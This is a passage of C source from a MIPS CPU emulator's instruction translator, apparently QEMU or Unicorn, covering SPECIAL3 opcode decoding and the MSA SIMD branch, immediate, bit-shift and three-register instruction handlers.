OPC_LBUE: case OPC_LHUE: case OPC_LBE: case OPC_LHE: case OPC_LLE: case OPC_LWE: check_cp0_enabled(ctx); gen_ld(ctx, op1, rt, rs, imm); return; case OPC_SWLE: case OPC_SWRE: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_SBE: case OPC_SHE: case OPC_SWE: check_cp0_enabled(ctx); gen_st(ctx, op1, rt, rs, imm); return; case OPC_SCE: check_cp0_enabled(ctx); gen_st_cond(ctx, rt, rs, imm, MO_TESL, true); return; case OPC_CACHEE: check_cp0_enabled(ctx); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, imm); } /* Treat as NOP. */ return; case OPC_PREFE: check_cp0_enabled(ctx); /* Treat as NOP. */ return; } } switch (op1) { case OPC_EXT: case OPC_INS: check_insn(ctx, ISA_MIPS32R2); gen_bitops(ctx, op1, rt, rs, sa, rd); break; case OPC_BSHFL: op2 = MASK_BSHFL(ctx->opcode); switch (op2) { case OPC_ALIGN: case OPC_ALIGN_1: case OPC_ALIGN_2: case OPC_ALIGN_3: case OPC_BITSWAP: check_insn(ctx, ISA_MIPS32R6); decode_opc_special3_r6(env, ctx); break; default: check_insn(ctx, ISA_MIPS32R2); gen_bshfl(ctx, op2, rt, rd); break; } break; #if defined(TARGET_MIPS64) case OPC_DEXTM: case OPC_DEXTU: case OPC_DEXT: case OPC_DINSM: case OPC_DINSU: case OPC_DINS: check_insn(ctx, ISA_MIPS64R2); check_mips_64(ctx); gen_bitops(ctx, op1, rt, rs, sa, rd); break; case OPC_DBSHFL: op2 = MASK_DBSHFL(ctx->opcode); switch (op2) { case OPC_DALIGN: case OPC_DALIGN_1: case OPC_DALIGN_2: case OPC_DALIGN_3: case OPC_DALIGN_4: case OPC_DALIGN_5: case OPC_DALIGN_6: case OPC_DALIGN_7: case OPC_DBITSWAP: check_insn(ctx, ISA_MIPS32R6); decode_opc_special3_r6(env, ctx); break; default: check_insn(ctx, ISA_MIPS64R2); check_mips_64(ctx); op2 = MASK_DBSHFL(ctx->opcode); gen_bshfl(ctx, op2, rt, rd); break; } break; #endif case OPC_RDHWR: gen_rdhwr(ctx, rt, rd, extract32(ctx->opcode, 6, 3)); break; case OPC_FORK: check_mt(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); gen_helper_fork(tcg_ctx, t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; case OPC_YIELD: check_mt(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_helper_yield(tcg_ctx, t0, tcg_ctx->cpu_env, t0); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; default: if (ctx->insn_flags & ISA_MIPS32R6) { decode_opc_special3_r6(env, ctx); } else { decode_opc_special3_legacy(env, ctx); } } } /* MIPS SIMD Architecture (MSA) */ 
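/*
 * gen_check_zero_element() below emits TCG ops for the classic SWAR
 * zero-lane test: (x - ones) & ~x & highs is non-zero iff at least one
 * lane of x is zero. A minimal host-side sketch of the per-64-bit step
 * follows; the function name is illustrative only and is not part of
 * the translator proper.
 */
static inline bool msa_any_lane_zero64_sketch(uint64_t x, uint64_t ones,
                                              uint64_t highs)
{
    /* e.g. DF_BYTE: ones = 0x0101010101010101, highs = 0x8080808080808080.
     * Subtracting the per-lane 1 sets a lane's high bit when the lane was
     * zero (or already >= 0x80); "& ~x" then masks out the lanes whose
     * high bit was set to begin with, leaving bits only for zero lanes. */
    return ((x - ones) & ~x & highs) != 0;
}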
static inline int check_msa_access(DisasContext *ctx) { if (unlikely((ctx->hflags & MIPS_HFLAG_FPU) && !(ctx->hflags & MIPS_HFLAG_F64))) { generate_exception_end(ctx, EXCP_RI); return 0; } if (unlikely(!(ctx->hflags & MIPS_HFLAG_MSA))) { if (ctx->insn_flags & ASE_MSA) { generate_exception_end(ctx, EXCP_MSADIS); return 0; } else { generate_exception_end(ctx, EXCP_RI); return 0; } } return 1; } static void gen_check_zero_element(TCGContext *tcg_ctx, TCGv tresult, uint8_t df, uint8_t wt) { /* generates tcg ops to check if any element is 0 */ /* Note this function only works with MSA_WRLEN = 128 */ uint64_t eval_zero_or_big = 0; uint64_t eval_big = 0; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); switch (df) { case DF_BYTE: eval_zero_or_big = 0x0101010101010101ULL; eval_big = 0x8080808080808080ULL; break; case DF_HALF: eval_zero_or_big = 0x0001000100010001ULL; eval_big = 0x8000800080008000ULL; break; case DF_WORD: eval_zero_or_big = 0x0000000100000001ULL; eval_big = 0x8000000080000000ULL; break; case DF_DOUBLE: eval_zero_or_big = 0x0000000000000001ULL; eval_big = 0x8000000000000000ULL; break; } tcg_gen_subi_i64(tcg_ctx, t0, tcg_ctx->msa_wr_d[wt << 1], eval_zero_or_big); tcg_gen_andc_i64(tcg_ctx, t0, t0, tcg_ctx->msa_wr_d[wt << 1]); tcg_gen_andi_i64(tcg_ctx, t0, t0, eval_big); tcg_gen_subi_i64(tcg_ctx, t1, tcg_ctx->msa_wr_d[(wt << 1) + 1], eval_zero_or_big); tcg_gen_andc_i64(tcg_ctx, t1, t1, tcg_ctx->msa_wr_d[(wt << 1) + 1]); tcg_gen_andi_i64(tcg_ctx, t1, t1, eval_big); tcg_gen_or_i64(tcg_ctx, t0, t0, t1); /* if all bits are zero then all elements are not zero */ /* if some bit is non-zero then some element is zero */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t0, t0, 0); tcg_gen_trunc_i64_tl(tcg_ctx, tresult, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_msa_branch(CPUMIPSState *env, DisasContext *ctx, uint32_t op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t df = (ctx->opcode >> 21) & 0x3; uint8_t wt = (ctx->opcode >> 16) & 0x1f; int64_t s16 = (int16_t)ctx->opcode; check_msa_access(ctx); if (ctx->hflags & MIPS_HFLAG_BMASK) { generate_exception_end(ctx, EXCP_RI); return; } switch (op1) { case OPC_BZ_V: case OPC_BNZ_V: { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_or_i64(tcg_ctx, t0, tcg_ctx->msa_wr_d[wt << 1], tcg_ctx->msa_wr_d[(wt << 1) + 1]); tcg_gen_setcondi_i64(tcg_ctx, (op1 == OPC_BZ_V) ? 
TCG_COND_EQ : TCG_COND_NE, t0, t0, 0); tcg_gen_trunc_i64_tl(tcg_ctx, tcg_ctx->bcond, t0); tcg_temp_free_i64(tcg_ctx, t0); } break; case OPC_BZ_B: case OPC_BZ_H: case OPC_BZ_W: case OPC_BZ_D: gen_check_zero_element(tcg_ctx, tcg_ctx->bcond, df, wt); break; case OPC_BNZ_B: case OPC_BNZ_H: case OPC_BNZ_W: case OPC_BNZ_D: gen_check_zero_element(tcg_ctx, tcg_ctx->bcond, df, wt); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->bcond, tcg_ctx->bcond, 0); break; } ctx->btarget = ctx->base.pc_next + (s16 << 2) + 4; ctx->hflags |= MIPS_HFLAG_BC; ctx->hflags |= MIPS_HFLAG_BDS32; } static void gen_msa_i8(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_I8(op) (MASK_MSA_MINOR(op) | (op & (0x03 << 24))) uint8_t i8 = (ctx->opcode >> 16) & 0xff; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 ti8 = tcg_const_i32(tcg_ctx, i8); switch (MASK_MSA_I8(ctx->opcode)) { case OPC_ANDI_B: gen_helper_msa_andi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_ORI_B: gen_helper_msa_ori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_NORI_B: gen_helper_msa_nori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_XORI_B: gen_helper_msa_xori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_BMNZI_B: gen_helper_msa_bmnzi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_BMZI_B: gen_helper_msa_bmzi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_BSELI_B: gen_helper_msa_bseli_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_SHF_B: case OPC_SHF_H: case OPC_SHF_W: { uint8_t df = (ctx->opcode >> 24) & 0x3; if (df == DF_DOUBLE) { generate_exception_end(ctx, EXCP_RI); } else { TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); gen_helper_msa_shf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, ti8); tcg_temp_free_i32(tcg_ctx, tdf); } } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, ti8); } static void gen_msa_i5(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_I5(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) uint8_t df = (ctx->opcode >> 21) & 0x3; int8_t s5 = (int8_t) sextract32(ctx->opcode, 16, 5); uint8_t u5 = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 timm = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, timm, u5); switch (MASK_MSA_I5(ctx->opcode)) { case OPC_ADDVI_df: gen_helper_msa_addvi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_SUBVI_df: gen_helper_msa_subvi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_MAXI_S_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_maxi_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_MAXI_U_df: gen_helper_msa_maxi_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_MINI_S_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_mini_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_MINI_U_df: gen_helper_msa_mini_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CEQI_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); 
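/* CEQI, like the other signed-immediate cases (MAXI_S, MINI_S, CLTI_S,
 * CLEI_S), reloads timm with the sign-extended s5 value; the unsigned
 * cases keep the zero-extended u5 loaded at the top of the function. */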
gen_helper_msa_ceqi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CLTI_S_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_clti_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CLTI_U_df: gen_helper_msa_clti_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CLEI_S_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_clei_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CLEI_U_df: gen_helper_msa_clei_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_LDI_df: { int32_t s10 = sextract32(ctx->opcode, 11, 10); tcg_gen_movi_i32(tcg_ctx, timm, s10); gen_helper_msa_ldi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, timm); } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, tdf); tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, timm); } static void gen_msa_bit(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_BIT(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) uint8_t dfm = (ctx->opcode >> 16) & 0x7f; uint32_t df = 0, m = 0; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 tdf; TCGv_i32 tm; TCGv_i32 twd; TCGv_i32 tws; if ((dfm & 0x40) == 0x00) { m = dfm & 0x3f; df = DF_DOUBLE; } else if ((dfm & 0x60) == 0x40) { m = dfm & 0x1f; df = DF_WORD; } else if ((dfm & 0x70) == 0x60) { m = dfm & 0x0f; df = DF_HALF; } else if ((dfm & 0x78) == 0x70) { m = dfm & 0x7; df = DF_BYTE; } else { generate_exception_end(ctx, EXCP_RI); return; } tdf = tcg_const_i32(tcg_ctx, df); tm = tcg_const_i32(tcg_ctx, m); twd = tcg_const_i32(tcg_ctx, wd); tws = tcg_const_i32(tcg_ctx, ws); switch (MASK_MSA_BIT(ctx->opcode)) { case OPC_SLLI_df: gen_helper_msa_slli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SRAI_df: gen_helper_msa_srai_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SRLI_df: gen_helper_msa_srli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BCLRI_df: gen_helper_msa_bclri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BSETI_df: gen_helper_msa_bseti_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BNEGI_df: gen_helper_msa_bnegi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BINSLI_df: gen_helper_msa_binsli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BINSRI_df: gen_helper_msa_binsri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SAT_S_df: gen_helper_msa_sat_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SAT_U_df: gen_helper_msa_sat_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SRARI_df: gen_helper_msa_srari_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SRLRI_df: gen_helper_msa_srlri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, tdf); tcg_temp_free_i32(tcg_ctx, tm); tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); } static void gen_msa_3r(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_3R(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) uint8_t df = (ctx->opcode >> 21) & 0x3; uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 tdf = 
tcg_const_i32(tcg_ctx, df); TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); switch (MASK_MSA_3R(ctx->opcode)) { case OPC_BINSL_df: switch (df) { case DF_BYTE: gen_helper_msa_binsl_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_binsl_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_binsl_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_binsl_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_BINSR_df: switch (df) { case DF_BYTE: gen_helper_msa_binsr_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_binsr_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_binsr_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_binsr_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_BCLR_df: switch (df) { case DF_BYTE: gen_helper_msa_bclr_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_bclr_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_bclr_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_bclr_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_BNEG_df: switch (df) { case DF_BYTE: gen_helper_msa_bneg_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_bneg_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_bneg_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_bneg_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_BSET_df: switch (df) { case DF_BYTE: gen_helper_msa_bset_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_bset_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_bset_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_bset_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADD_A_df: switch (df) { case DF_BYTE: gen_helper_msa_add_a_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_add_a_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_add_a_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_add_a_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADDS_A_df: switch (df) { case DF_BYTE: gen_helper_msa_adds_a_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_adds_a_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_adds_a_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_adds_a_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADDS_S_df: switch (df) { case DF_BYTE: gen_helper_msa_adds_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_adds_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_adds_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_adds_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADDS_U_df: switch (df) { case DF_BYTE: gen_helper_msa_adds_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_adds_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: 
gen_helper_msa_adds_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_adds_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADDV_df: switch (df) { case DF_BYTE: gen_helper_msa_addv_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_addv_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_addv_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_addv_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_AVE_S_df: switch (df) { case DF_BYTE: gen_helper_msa_ave_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ave_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ave_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ave_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_AVE_U_df: switch (df) { case DF_BYTE: gen_helper_msa_ave_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ave_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ave_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ave_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_AVER_S_df: switch (df) { case DF_BYTE: gen_helper_msa_aver_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_aver_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_aver_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_aver_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_AVER_U_df: switch (df) { case DF_BYTE: gen_helper_msa_aver_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_aver_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_aver_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_aver_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CEQ_df: switch (df) { case DF_BYTE: gen_helper_msa_ceq_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ceq_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ceq_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ceq_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CLE_S_df: switch (df) { case DF_BYTE: gen_helper_msa_cle_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_cle_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_cle_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_cle_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CLE_U_df: switch (df) { case DF_BYTE: gen_helper_msa_cle_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_cle_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_cle_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_cle_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CLT_S_df: switch (df) { case DF_BYTE: gen_helper_msa_clt_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_clt_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: 
gen_helper_msa_clt_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_clt_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CLT_U_df: switch (df) { case DF_BYTE: gen_helper_msa_clt_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_clt_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_clt_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_clt_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_DIV_S_df: switch (df) { case DF_BYTE: gen_helper_msa_div_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_div_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_div_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_div_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_DIV_U_df: switch (df) { case DF_BYTE: gen_helper_msa_div_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_div_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_div_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_div_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MAX_A_df: switch (df) { case DF_BYTE: gen_helper_msa_max_a_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_max_a_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_max_a_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_max_a_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MAX_S_df: switch (df) { case DF_BYTE: gen_helper_msa_max_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_max_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_max_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_max_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MAX_U_df: switch (df) { case DF_BYTE: gen_helper_msa_max_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_max_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_max_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_max_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MIN_A_df: switch (df) { case DF_BYTE: gen_helper_msa_min_a_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_min_a_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_min_a_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_min_a_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MIN_S_df: switch (df) { case DF_BYTE: gen_helper_msa_min_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_min_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_min_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_min_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MIN_U_df: switch (df) { case DF_BYTE: gen_helper_msa_min_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_min_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: 
